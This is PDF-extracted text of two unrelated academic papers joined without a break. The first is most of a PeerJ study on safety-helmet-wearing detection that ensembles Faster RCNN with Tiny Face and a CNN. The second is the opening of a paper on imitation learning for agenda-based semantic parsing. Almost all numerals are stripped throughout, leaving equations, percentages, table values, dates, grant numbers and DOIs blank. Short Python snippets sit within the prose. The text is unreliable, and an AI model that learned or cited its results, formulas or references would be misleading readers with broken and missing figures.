follows s(csf,csc,δ,α)= ∑ i αihi(csf,csc,δ) ( ) where α is the model parameter, δ is a vector containing the area of corresponding anchors, and hi() is a classifier. we choose decision trees with maximum depth of two in the experiment, and i is ranged from to . the variable δ is used here because the two base algorithms are good at identifying relatively large and small objects respectively, and adding covering areas of anchors can help improve the accuracy. thus, in the ensemble method, as is the anchor lists, and cs=s(csf,csc,δ,α) contains the corresponding confidence values about helmet-wearing. to train this model, we merge the anchor set as and the ground-truth set a in a similar manner as merging af and at , and we use ĉsf, ĉsc and ĉ to represent the corresponding variables after merging. zeros are filled if the corresponding anchor does not exist before merging. then, the loss between the identified anchors in as and the ground-truth anchors a is e(δ,α,ĉsf,ĉsc,ĉ)= n∑ i= (s(ĉsf[i],ĉsc[i],δ,α)− ĉ[i]) ( ) where n is the total anchors after merging. the optimal value of α can be computed by minimizing the error α ∗ =argminαe(α,ĉsf,ĉsc,ĉ) ( ) fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the whole process can be described by the pseudocode below. 
experiments in order to evaluate the performance of our framework, we use five criteria: tpr=m/n ( ) fpr= l/k ( ) re =m/n ( ) fnr= −re ( ) pre =m/(m+l) ( ) where tpr is the true positive rate, fpr is the false positive rate, fnr is the false negative rate, re is the recall rate, pre is the precision rate, m is the correct prediction by models under the current threshold, n is the number of parts of the model detection result that are identical to the truth ground, l is the false prediction by models under the current threshold, k is the number of parts of the model detection result that are different from the truth ground, and n is the number of targets that actually exist. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure faster rcnn detecting big faces. full-size doi: . /peerjcs. /fig- to evaluate our approach, we take the publicly available benchmark data set (safety helmet wearing-dataset, ), containing images from construction sites, roads, workshops, and classrooms. the data set consists of a total of , images. we use five-fold cross validations for experiments. we randomly divide all the images into five parts. training set, validation set, and testing set contains / , / , and / of the total images respectively. preliminary analysis the detection results of faster rcnn for faces are shown in figs. and . from these two figures, we can see that faster-rcnn is suitable for detecting large objects, but not finding small ones. the detection results of tiny face are shown in fig. . from this result, we can see that tiny face is good at finding small faces. to compare the differences between the two models, we used faster rcnn and tiny face to test the images from the data set, and count the number of faces of different sizes detected by the two models. figure is the histogram of real data, and fig. is the histogram of face sizes detected by faster rcnn. taking the number of pixels (px ) as the area measurement, a face with an area smaller than px is defined as a small face, and a face larger than px is defined as a large face. because of the large area span, the smallest face is only px , while the largest face can reach px . in order to prevent the histograms from crowding together, only faces with an area less than px are shown in the figure. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure faster rcnn detecting small faces. full-size doi: . /peerjcs. /fig- figure tiny face detecting small faces. full-size doi: . /peerjcs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure histogram of real data. full-size doi: . /peerjcs. /fig- figure histogram of face sizes detected by faster rcnn. full-size doi: . /peerjcs. /fig- according to statistics, there are actually , big faces and small faces. the initial model of faster rcnn can detect , big faces and small faces. under the assumption that the labels are correct, the false negative rate of big faces is . %, and that of small faces is . %. obviously, the faster rcnn model has lower accuracy for small faces. then we performed statistics on tiny face and got the histogram of tiny face detection results in fig. . tiny face can detect large faces and small faces. the false negative rate for large faces is . %, which is . 
% higher than faster rcnn, and the false negative rate for small faces is . %, which is . % lower than faster rcnn. although it is only a preliminary model, the model has not been adjusted and the amount of training has been fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure histogram of face sizes detected by tiny face. full-size doi: . /peerjcs. /fig- adjusted to improve the accuracy of the model, but it is not difficult to see from the current data that the detection capabilities of the faster rcnn and tiny face models have their own focus. when faster rcnn detects large faces, it has a great advantage, and tiny face’s ability to detect small faces is better than faster rcnn. we can find that faster rcnn has a higher true positive rate for detecting large faces and tiny face has a higher true positive rate for detecting small faces. the overall effect can be better if we can combine the two methods. accuracy of base algorithms for helmet detection accuracy of f(i,w∗f ). in this part, we evaluate the accuracy of t(i,w ∗ t ) alone in algo. . theoretically, the more training steps the model has, the better, but in order to prevent overfitting, we still need to observe the accuracy of the model under different training steps. in the beginning, we select some images from training dataset to evaluate the model. we trained , steps and used the model to test the images of the training set, but it was obvious that the effect was not very satisfactory. because t(i,w∗t ) is based on faster rcnn, which has high accuracy, it is easy to miss the mark of small faces. therefore, the quality of the model can be preliminarily judged by the number of detected targets, and then we gradually increased the number of training steps. when the number of training steps reaches , steps, the number of detected targets in the detection results of , test set images is basically maintained at about , . as the number of training steps increases, the number of detected targets increases slightly. when the number reaches , steps, the number of detected targets is , . at this time, precision rate of the model is . %,and the recall rate is . %. when the number of training steps reaches , steps, the number of detected targets is close to , . at this time, the precision rate of the model is . %, and the recall rate is . %. we find that fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table relationship between training steps and accuracy. steps precision rate recall rate , . % . % , . % . % , . % . % , . % . % , . % . % figure roc with respect to a full-size doi: . /peerjcs. /fig- although the recall rate has a slight increase, but the precision rate is much lower, so we chose the model with , training steps as the final model. see table for the accuracy of f(i,w∗f ) under different training steps. regarding to the scoring threshold, it is . by default, which means that when the score is lower than . , the result will be discarded. we successively set the threshold to . , . , . , . , . , and tested the validation data to choose the one that works best. finally, we found that when the threshold is . , the precision rate of the test result is . %, and the recall rate is . %, which is better than other thresholds. after comprehensive consideration, we finally keep . as the threshold for the ensemble. 
the roc curve on the training set is shown in fig. . when training this model, in order to distinguish whether an individual wearing a helmet, we use two labels: people wearing and without wearing a helmet. it makes the final trained model more accurately distinguish whether the target wears a helmet. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure roc with respect to a_t and c_c. full-size doi: . /peerjcs. /fig- accuracy of t(i,w∗t ). in this part, we consider the accuracy of t(i,w ∗ t ) alone in algo. . it is basically a trained tiny face model. we lowered the scoring threshold of tiny face to . , requiring the tiny face model to be able to determine the location of the small face, and it does not need it to accurately return the scoring value. the precision rate of face detection was . %, and the recall rate was . %. accuracy of c(at,i,w∗c). in this part, we consider the accuracy of c(at,i,w ∗ c) alone in algo. . function c(at,i,w∗c) is basically a cnn model, which requires only one target in an image, so we select over , images from the training set, cropped the target according to the corresponding anchor labels and get , images with only one target in each image. we select , images as training data for cnn, and the other , images as a validation set to detect the accuracy of cnn, also the cropped images are divided into two sets, people wearing helmets and without wearing helmets. in addition, we rotate some images to get richer training samples. with cross-validation, we choose to use four pairs of convolution and pooling layers, of which the first layer and the size of the convolution kernel of the second convolution layer are [ , ], and the size of the convolution kernel of the third and fourth convolution layers is [ , ]. the precision rate of the final two-class cnn reached . % when we use it to test the validation set of cnn. the roc curve on the training set is shown in fig. . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure roc with respect to a_s and c_s <!–[if !msequation]–> <!–[endif]–>. full-size doi: . /peerjcs. /fig- accuracy of ensemble method s(csf,csc,α∗). the roc curve coverage areas of faster cnn and at , cc are . and . , respectively. the ensemble method can further improve the accuracy of the final result. among the data, cf and cc are the results from two base methods, respectively, and the area is the size of the target frame. obviously, cf and cc can be used as the characteristic values of the ensemble method. we test the trained model, and the area under the roc curve coverage is larger, becoming . . the roc curve on the training set is shown in fig. . obviously, the roc curve covered by the ensemble method has the largest coverage area, which proves that the ensemble method is effective in our model. comparison of different algorithms. in this part, we demonstrate the effectiveness of our ensemble framework by combining faster rcnn and tiny face+cnn together with roc curve and pr curve. the roc and pr curves are calculated from testing results through -fold cross-validation as figs. and . from figs. and , we can see that combination with our framework (in green) is better than single algorithms (in black and orange). our framework can also gain the largest area under the roc curve ( . ) in fig. , and the largest area under the pr curve ( . ), namely the map score. 
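the quantities just reported, the area under the roc curve and the area under the pr curve (the map-style score), can be computed from matched detection scores with standard tooling. a minimal sketch with scikit-learn; the arrays are placeholders, not the paper's data.

import numpy as np
from sklearn.metrics import roc_auc_score, average_precision_score

# y_true: 1 if the candidate detection is correct, 0 otherwise;
# y_score: the (single or fused) confidence assigned to that candidate
y_true = np.array([1, 0, 1, 1, 0, 1])                  # placeholder labels
y_score = np.array([0.9, 0.4, 0.75, 0.6, 0.55, 0.8])   # placeholder scores

print("area under roc:", roc_auc_score(y_true, y_score))
print("area under pr :", average_precision_score(y_true, y_score))

computing these per algorithm (single base model versus the ensemble) gives the kind of side-by-side numbers reported in the comparison tables and figures.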
it means our framework works best on average over all the possible threshold choices. tables and reveals a similar phenomenon when a reasonable threshold is chosen. it indicates that, with a well-chosen threshold, our framework works better than others in terms of tpr, fpr,fnr, precision, and recall. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison with roc. full-size doi: . /peerjcs. /fig- figure comparison with pr. full-size doi: . /peerjcs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison with tpr, fpr, fnr. algorithm true positive rate false positive rate false negative rate faster rcnn . % . % . % tinyface + cnn . % . % . % faster rcnn + tiny face + cnn . % . % . % table comparison with precision and recall. algorithm precision recall faster rcnn . % . % tiny face + cnn . % . % faster rcnn + tiny face + cnn . % . % figure comparison with roc for integrating mobilenet and tiny face. full-size doi: . /peerjcs. /fig- our framework can also be used to integrate other complementary deep learning methods to improve their performance. as an example, we use our framework to combine mobilenet and tinyface+cnn, and compare the integrated results with single algorithms. the performance is shown in figs. and . similar to the previous case, the algorithm performance is generally improved. our framework also works well when a specific threshold is chosen, as shown in tables and . through these experiments, we can find that the integrated framework for two complementary models can improve the performance of single algorithms by increasing fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison with pr for integrating mobilenet and tiny face. full-size doi: . /peerjcs. /fig- table comparison with tpr, fpr, fnr for integrating mobilenet and tiny face. algorithm true positive rate false positive rate false negative rate mobilenet . % . % . % tinyface + cnn . % . % . % mobilenet + tiny face + cnn . % . % . % table comparison with precision and recall for integrating mobilenet and tiny face. algorithm precision recall mobilenet . % . % tiny face + cnn . % . % mobilenet + tiny face + cnn . % . % the true positive rate, the precision rate, and the recall rate, while reducing the false positive rate and false negative rate. discussion the detection accuracy of a single model is usually not a satisfactory, so we use an ensemble method to integrate models to get better results. considering complementary behaviors of different algorithms, using an ensemble method for integration can effectively improve the accuracy of the detection results. for example, through our experiments, we can use fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. tiny face model with cnn to overcome the shortcomings that the faster rcnn model possesses when detecting small faces. although the proportion of small faces in the test set of this experiment is not very large, the missing rate is still one percent lower than that of a single model. in the test set with a large proportion of small faces, the detection accuracy of the integrated model can be improved further. 
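the integration discussed above can be sketched at the score level. after the outputs of the two base models are matched, the confidences c_f (from faster rcnn) and c_c (from tiny face + cnn) and the box area, which the ensemble-method subsection names as its features, feed a small learned combiner. the choice of logistic regression and the toy numbers below are assumptions for illustration; the text only states which features enter the ensemble function s.

import numpy as np
from sklearn.linear_model import LogisticRegression

# one row per candidate box after matching the outputs of the two base models:
# [c_f (faster rcnn confidence), c_c (tiny face + cnn confidence), box area]
X = np.array([[0.92, 0.15, 5200.0],   # toy values, not real data
              [0.10, 0.84,  310.0],
              [0.35, 0.30,  880.0]])
y = np.array([1, 1, 0])               # 1 = correct helmet-wearing detection

ensemble = LogisticRegression().fit(X, y)

def fused_score(c_f, c_c, area):
    # combined confidence used to accept or reject a candidate detection
    return ensemble.predict_proba([[c_f, c_c, area]])[0, 1]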
conclusion

when the detection accuracy of a single deep learning model cannot meet the demands of helmet-wearing detection, we can integrate a complementary model with it to obtain better results. in addition, our framework can make single algorithms more robust to data sets from different scenarios, because it can exploit the advantages of the complementary algorithms. by analyzing a variety of object detection models, we find that many models struggle to achieve high precision for helmet-wearing detection across different scenarios. therefore, we carefully select two complementary base models and add additional modules to make them suitable for helmet-wearing detection. we ensemble the base models and build a more powerful helmet-wearing detection algorithm to further improve the detection capability. our approach can be accelerated on gpus and deployed on distributed computers to reduce processing time, and thus can be useful in real-world scenarios. in the future, the model can also be extended by integrating additional features or models and upgraded to mixed neural network models.

additional information and declarations

funding
this work was supported by the national natural science foundation of china (no. ), the natural science foundation of zhejiang province (no. lgg f ), the ningbo science and technology innovation project (no. b ), and the qianjiang talent plan (no. qjd ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
national natural science foundation of china: .
natural science foundation of zhejiang province: lgg f .
ningbo science and technology innovation project: b .
qianjiang talent plan: qjd .

competing interests
the authors declare there are no competing interests.

author contributions
• zheming fan and chengbin peng conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• licun dai conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
• feng cao, jianyu qi and wenyi hua performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability:
code is available as a supplemental file. the data set is available at github: https://github.com/njvisionpower/safety-helmet-wearing-dataset.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
anonymous. . safety helmet wearing-dataset. available at https://github.com/njvisionpower/safety-helmet-wearing-dataset (accessed on august ).
bo y, huan q, huan x, rong z, hongbin l, kebin m, weizhong z, lei z. . helmet detection under the power construction scene based on image analysis. in: ieee th international conference on computer science and network technology (iccsnt). piscataway: ieee, – .
choudhury t, aggarwal a, tomar r. . a deep learning approach to helmet detection for road safety.
journal of scientific and industrial research ( ): – . donahue j, jia y, vinyals o, hoffman j, zhang n, tzeng e, darrell t. . a deep convolutional activation feature for generic visual recognition. berkeley: uc berkeley & icsi. feng x, jiang y, yang x, du m, li x. . computer vision algorithms and hardware implementations: a survey. integration : – doi . /j.vlsi. . . . freund y, schapire re. . a decision-theoretic generalization of on-line learning and an application to boosting. journal of computer and system sciences ( ): – doi . /jcss. . . fukushima k, miyake s. . neocognitron: a self-organizing neural network model for a mechanism of visual pattern recognition. in: competition and cooperation in neural nets. berlin, heidelberg: springer, – . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://github.com/njvisionpower/safety-helmet-wearing-dataset https://github.com/njvisionpower/safety-helmet-wearing-dataset http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://github.com/njvisionpower/safety-helmet-wearing-dataset https://github.com/njvisionpower/safety-helmet-wearing-dataset http://dx.doi.org/ . /j.vlsi. . . http://dx.doi.org/ . /jcss. . http://dx.doi.org/ . /peerj-cs. garcia-garcia a, orts-escolano s, oprea s, villena-martinez v, garcia-rodriguez j. . a review on deep learning techniques applied to semantic segmentation. arxiv preprint. arxiv: . . girshick r. . fast r-cnn. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . girshick r, donahue j, darrell t, malik j. . rich feature hierarchies for accurate object detection and semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. – . hu p, ramanan d. . finding tiny faces. in: proceedings of the ieee conference on computer vision and pattern recognition. – . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolu- tional neural networks. communications of the acm ( ): – . lecun y, bottou l, bengio y, haffner p. . gradient-based learning applied to docu- ment recognition. proceedings of the ieee ( ): – doi . / . . li k, zhao x, bian j, tan m. a. automatic safety helmet wearing detection. in: ieee th annual international conference on cyber technology in automation, control, and intelligent systems (cyber). piscataway: ieee, – . li j, liu h, wang t, jiang m, wang s, li k, zhao x. b. safety helmet wearing detec- tion based on image processing and machine learning. in: ninth international conference on advanced computational intelligence (icaci). piscataway: ieee, – . liu bc, ivers r, norton r, boufous s, blows s, lo sk. . helmets for preventing injury in motorcycle riders. cochrane database of systematic reviews :cd doi . / .cd .pub . liu xh, ye xn. . skin color detection and hu moments in helmet recognition research. journal of east china university of science and technology : – . long x, cui w, zheng z. . safety helmet wearing detection based on deep learning. in: ieee rd information technology, networking, electronic and automation control conference (itnec). piscataway: ieee, – . redmon j, divvala s, girshick r, farhadi a. . you only look once: unified, real- time object detection. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . ren s, he k, girshick r, sun j. . 
faster r-cnn: towards real-time object detection with region proposal networks. in: advances in neural information processing systems. – . rubaiyat ah, toma tt, kalantari-khandani m, rahman sa, chen l, ye y, pan cs. . automatic detection of helmet uses for construction safety. in: ieee/wic/acm international conference on web intelligence workshops (wiw). piscataway: ieee, – . schapire re. . the strength of weak learnability. machine learning ( ): – . shi h, chen x, yang y. . safety helmet wearing detection method of improved yolov . computer engineering and applications : – doi . /j.issn. - . - . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . / .cd .pub http://dx.doi.org/ . /j.issn. - . - http://dx.doi.org/ . /peerj-cs. siebert fw, lin h. . detecting motorcycle helmet use with deep learning. accident analysis & prevention : doi . /j.aap. . . thompson dc, rivara f, thompson r. . helmets for preventing head and facial injuries in bicyclists. cochrane database of systematic reviews ( ):cd doi . / .cd . world health organization. . helmets: a road safety manual for decision-makers and practitioners. geneva: world health organization. yunbo liu, huang h. . research on monitoring of workers’ helmet wearing at the construction site. electronic science and technology ( ): – . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.aap. . http://dx.doi.org/ . / .cd http://dx.doi.org/ . /peerj-cs. imitation learning of agenda-based semantic parsers jonathan berant stanford university yonatan@cs.stanford.edu percy liang stanford university pliang@cs.stanford.edu abstract semantic parsers conventionally construct logical forms bottom-up in a fixed order, re- sulting in the generation of many extraneous partial logical forms. in this paper, we com- bine ideas from imitation learning and agenda- based parsing to train a semantic parser that searches partial logical forms in a more strate- gic order. empirically, our parser reduces the number of constructed partial logical forms by an order of magnitude, and obtains a x- x speedup over fixed-order parsing, while main- taining comparable accuracy. introduction semantic parsing, the task of mapping natural language to semantic representations (e.g., log- ical forms), has emerged in recent years as a promising paradigm for developing question an- swering systems (zelle and mooney, ; zettle- moyer and collins, ; wong and mooney, ; kwiatkowski et al., ; liang et al., ) and other natural language interfaces (zettlemoyer and collins, ; tellex et al., ; matuszek et al., ). recently, there have been two ma- jor trends: the first is to scale semantic parsing to large knowledge bases (kb) such as freebase (cai and yates, ; kwiatkowski et al., ; berant and liang, ). the second is to learn semantic parsers without relying on annotated logical forms, but instead on their denotations (answers) (clarke et al., ; liang et al., ); this lessens the anno- tation burden and has been instrumental in fueling the first trend (berant et al., ). what city was abraham lincoln born in > m type.city u placeofbirthof.abelincoln type.loc u containedby.lincolntown . . . abelincoln lincolntown usslincoln . . . type.city type.loc . . . placeofbirthof placeslived . . . figure : a parsing chart for the utterance “what city was abraham lincoln born in”. 
numbers in chart cells indicate the number of possible semantic parses constructed over that span, and arrows point to some of the logical forms that were con- structed. there are more than one million possible semantic parses for this utterance. in this paper, we are interested in training seman- tic parsers from denotations on large kbs. the chal- lenge in this setting is that the vocabulary of the target logical language often contains thousands of logical predicates, and there is a mismatch between the structure of the natural language and the logical language. as a result, the space of possible seman- tic parses for even a short utterance grows quickly. for example, consider the utterance “what city was abraham lincoln born in”. figure illustrates the number of possible semantic parses that can be con- structed over some of the utterance spans. just by combining semantic parses over the spans “city”, “lincoln” and “born” we already obtain · · possible parses; at the root, we get over a million parses. the ambiguity of language thus results in a even when type constraints are used to prune parses, we still produce more than a million possible parses at the root. root:type.city u placeofbirthof.abelincoln what set:type.city city was set:placeofbirthof.abelincoln entity:abelincoln abraham lincoln binary:placeofbirthof born in join intersect lex lex lex figure : an example semantic parse, or derivation, for the utterance “what city was abraham lincoln born in”. each node in the tree has a category (e.g., entity) and a logical form (e.g., abelincoln). hard search problem. to manage this combinatorial explosion, past approaches (krishnamurthy and mitchell, ; kwiatkowski et al., ; berant et al., ) used beam search, where the number of parses (see fig- ure ) for each chart cell (e.g., (set, : )) is capped at k. typical bottom-up parsing is employed, where we build all parses for spans of length n before n + , etc. this fixed-order parsing strategy con- structs many unnecessary parses though. for ex- ample, it would create k parses for the category entity and the span over “lincoln”, generating the logical form usslincoln, although it is unlikely that this entity would be in the final logical form. to overcome the problems with fixed-order pars- ing, we turn to agenda-based parsing (kay, ; caraballo and charniak, ; klein and manning, ; pauls and klein, ; auli and lopez, ). in agenda-based parsing, an agenda (priority queue) holds partial parses that can be constructed next. at each step, the parse with the highest priority is popped from the agenda and put into the chart. this gives the parser full control over the sequence of parses constructed. but importantly, agenda-based parsing requires a good scoring function that can rank not just full parses but also partial parses on the agenda. how do we obtain such a scoring function? to this end, we borrow ideas from imitation learn- ing for structured prediction (daume et al., ; ross et al., ; goldberg and nivre, ; chang et al., ). specifically, we cast agenda-based se- mantic parsing as a markov decision process, where the goal is to learn a policy, that given a state (i.e., the current chart and agenda), chooses the best next action (i.e., the parse to pop from the agenda). the supervision signal is used to generate a sequence of oracle actions, from which the model is trained. our work bears a strong resemblance to jiang et al. ( ), who applied imitation learning to agenda- based parsing, but in the context of syntactic pars- ing. 
however, two new challenges arise in seman- tic parsing. first, syntactic parsing assumes gold parses, from which it is easy to derive an oracle ac- tion sequence. in contrast, we train from question- answer pairs only (rather than parse trees or even logical forms), so generating an oracle sequence is more challenging. second, semantic parsers explore a much larger search space than syntactic parsers, due to the high level of uncertainty when translating to logical form. thus, we hold a beam of parses for each chart cell, and modify learning for this setup. we gain further efficiency by introducing a lazy agenda, which reduces the number of parses that need to be scored. for example, the single action of processing “born”, requires placing logical forms on the agenda, although only few of them will be used. our lazy agenda holds derivation streams, which implicitly represent a (possibly in- finite!) group of related parses as a single agenda item, and lazily materialize parses as needed. em- pirically, this reduces the number of parses that are scored at training time by %. last, we make modeling contributions by aug- menting the feature set presented by berant et al. ( ) with new features that improve the mapping of phrases to kb predicates. we evaluate our agenda-based parser on the we- bquestions dataset (berant et al., ) against a fixed-order parser, and observe that our parser re- duces the number of parsing actions by an order of magnitude, achieves a x- x speedup, and obtains a comparable accuracy of . %. to conclude, this paper describes three contribu- tions: first, a novel agenda-based semantic parser that learns to choose good parsing actions, train- ing from question-answer pairs only; second, a lazy agenda that packs parses in streams and reduces the number of generated parses; last, modeling changes that substantially improve accuracy. semantic parsing task while our agenda-based semantic parser applies more broadly, our exposition will be based on our primary motivation, question answering on a knowl- edge base. the semantic parsing task is defined as follows: given (i) a knowledge base (kb) k, (ii) a grammar g (defined shortly), and (iii) a training set of question-answer pairs {(xi,yi)}ni= , output a se- mantic parser that maps new questions x to answers y via latent logical forms z. we now briefly describe the kb and logical forms used in this paper. let e denote a set of entities (e.g., abelincoln), and let p denote a set of properties (e.g., placeofbirthof). a knowledge base k is a set of assertions (e ,p,e ) ∈ e × p × e (e.g., (hodgenville,placeofbirthof,abelincoln)). we use the freebase kb (google, ), which has m entities, k properties, and m assertions. to query the kb, we use the logical language simple λ-dcs. in simple λ-dcs, an entity (e.g., abelincoln) denotes the singleton set containing that entity; this is a special case of a unary pred- icate. a property (a special case of a binary predicate) can be joined with a unary predicate; e.g., placeofbirthof.abelincoln denotes all en- tities that are the place of birth of abraham lin- coln. we also have intersection: type.city u placeofbirthof.abelincoln denotes the set of en- tities that are both cities and the place of birth of abraham lincoln. we write jzkk for the denotation of a logical form z with respect to a kb k. for a formal description of λ-dcs, see liang ( ). 
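the simple λ-dcs constructs just described (an entity as a singleton set, joining a property with a unary predicate, and intersection) can be illustrated over a toy kb of (entity, property, entity) assertions. this is a self-contained python sketch with a made-up kb, not the system's actual freebase machinery.

# toy kb: a set of assertions (e1, property, e2)
KB = {
    ("hodgenville", "placeofbirthof", "abelincoln"),
    ("hodgenville", "type", "city"),
    ("springfield", "type", "city"),
}

def entity(e):               # an entity denotes the singleton set {e}
    return {e}

def join(prop, unary):       # prop.unary, e.g. placeofbirthof.abelincoln
    return {e1 for (e1, p, e2) in KB if p == prop and e2 in unary}

def intersect(u1, u2):       # intersection of two unaries
    return u1 & u2

# denotation of type.city intersected with placeofbirthof.abelincoln
print(intersect(join("type", entity("city")),
                join("placeofbirthof", entity("abelincoln"))))
# -> {'hodgenville'}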
grammars and semantic functions since we are learning semantic parsers from deno- tations, we cannot induce a grammar from provided logical forms (kwiatkowski et al., ). instead, we assume a small and flexible grammar that spec- ifies the space of logical forms. the grammar con- sists of a backbone cfg, but is atypical in that each rule is augmented with a semantic (composition) function that produces a varying number of deriva- tions using arbitrary context. this flexibility pro- vides procedural control over the generation of logi- cal forms. formally, a grammar is a tuple (v,n ,r), where v is a set of terminals (words), n is a set of cate- gories (such as binary, entity, set and root in figure , where root is the root category), and r is a rule set of binary and unary rules, explained below. a binary rule r ∈ r has the form a → b c [f], where a ∈ n is the left-hand-side, b c ∈ n is the right-hand-side (rhs), and f is a semantic func- tion, explained below. given an utterance x, the grammar defines a set of derivations (semantic parse trees) over every span xi:j = (wi,wi+ ,. . . ,wj− ). define d to be the set of all derivations, and let dai:j be a derivation over the span xi:j of category a. given the deriva- tions dbi:k and d c k:j and the rule r = a → b c [f], the semantic function f : d × d → d pro- duces a set of derivations f(dbi:k,d c k:j) over xi:j with category a. in words, the semantic func- tion takes two child derivations as input and pro- duces a set of candidate output derivations. for each output derivation d, let d.r be the rule used (set → entity binary[join]) and d.z be the logical form constructed by f, usually created by combining the logical forms of the child deriva- tions (placeofbirthof.abelincoln). this com- pletes our description of binary rules; unary rules a → b [f] and lexical rules a → w [f] are handled similarly, where w ∈v+ is a sequence of terminals. figure demonstrates the flexibility of seman- tic functions. the join semantic function takes a derivation whose logical form is a binary predicate, and a derivation whose logical form is a unary pred- icate, and performs a join operation. lex takes a derivation representing a phrase and outputs many candidate derivations. intersect takes two deriva- tions and attempts to intersect their logical forms (as defined in section ). in this specific case, no out- put derivations are produced because the kb types for type.city and releasedateof.lincolnfilm do not match. in contrast with cfg rules for syntactic pars- ing, rules with semantic functions generate sets of derivations rather than a single derivation. we allow semantic functions to perform arbitrary operations on the child derivations, access external resources such as freebase search api and the kb. in prac- tice, our grammar employs semantic functions; in addition to join, lex, and intersect, we use bridge, which implements the bridging operation (see section ) from berant et al. ( ), as well as ones that recognize dates and filter derivations based on part-of-speech tags, named entity tags, etc. join ( entity:abelincoln abraham lincoln , binary:placeofbirthof born ) = { set:placeofbirthof.abelincoln entity:abelincoln abraham lincoln binary:placeofbirthof born } lex( lincoln ) = { entity:abelincoln lincoln , entity:lincolnfilm lincoln , ... 
} intersect ( set:type.city city , set:releasedateof.lincolnfilm abraham lincoln born ) = {} figure : a semantic function (we show join, lex and intersect) takes one or two child derivations and returns a set of possible derivations. fixed-order parsing we now describe fixed-order parsing with beam search, which has been the common practice in past work (krishnamurthy and mitchell, ; kwiatkowski et al., ; berant et al., ). let x be the input utterance. we call derivations droot :|x| , spanning the utterance x and with root cate- gory, root derivations, and all other derivations par- tial derivations. given a scoring function s : d → r, a bottom-up fixed-order parser iterates over spans xi:j of increasing length n and categories a ∈ n , and uses the grammar to generate derivations based on derivations of subspans. we use beam search, in which for every span xi:j and every category a we keep a beam that stores up to k derivations in a chart cell hai:j (where different derivations usually correspond to different logical forms). we denote by h the set of derivations in any chart cell. a fixed-order parser is guaranteed to compute the k highest-scoring derivations if the following two conditions hold: (i) all semantic functions return ex- actly one derivation, and (ii) the scoring function decomposes—that is, there is a function srule : r→ r such that for every rule r = a → b c [f], the score of a derivation produced by the rule is s(dai:j) = s(d b i:k)+s(d c k:j)+srule(r). unfortunately, the two conditions generally do not hold in seman- tic parsing. for example, the intersect function returns an empty set when type-checking fails, vi- olating condition (i), and the scoring function s of- ten depends on the denotation size of the constructed logical form, violating condition (ii). in general, we want the flexibility of having the scoring function depend on the logical forms and sub-derivations, and therefore we will not be concerned with exactness in this paper. note that we could augment the cat- egories n with the logical form, but this would in- crease the number of categories exponentially. model. we focus on linear scoring functions: s(d) = φ(d)>θ, where φ(d) ∈ rf is the feature vector and θ ∈ rf is the parameter vector to be learned. given any set of derivations d ⊆ d, we can define the corresponding log-linear distribution: pθ(d | d) = exp{φ(d)>θ}∑ d′∈d exp{φ(d′)>θ} . ( ) learning. the training data consists of a set of utterance-denotation (question-answer) pairs {(xi,yi)}ni= . to learn θ, we use an online learn- ing algorithm, where on each (xi,yi), we use beam search based on the current parameters to construct a set of root derivations di = hroot :|x| , and then take a gradient step on the following objective: oi(θ) = log p(yi | xi) ( ) = log ∑ d∈di pθ(d | di)r(d) + λ‖θ‖ , ( ) where r(d) ∈ [ , ] is a reward function that mea- sures the compatibility of the predicted denotation jd.zkk and the true denotation yi, . we marginalize over latent derivations, which are weighted by their compatibility with the observed denotation yi. the main drawback of fixed-order parsing is that to obtain the k root derivations di, the parser must first construct k derivations for all spans and all cat- egories, many of which will not make it into any root derivation d ∈ di. next, we describe agenda-based parsing, whose goal is to give the parser better con- trol over the constructed derivations. jd.zkk and yi are both sets of entities, so r is the f score. 
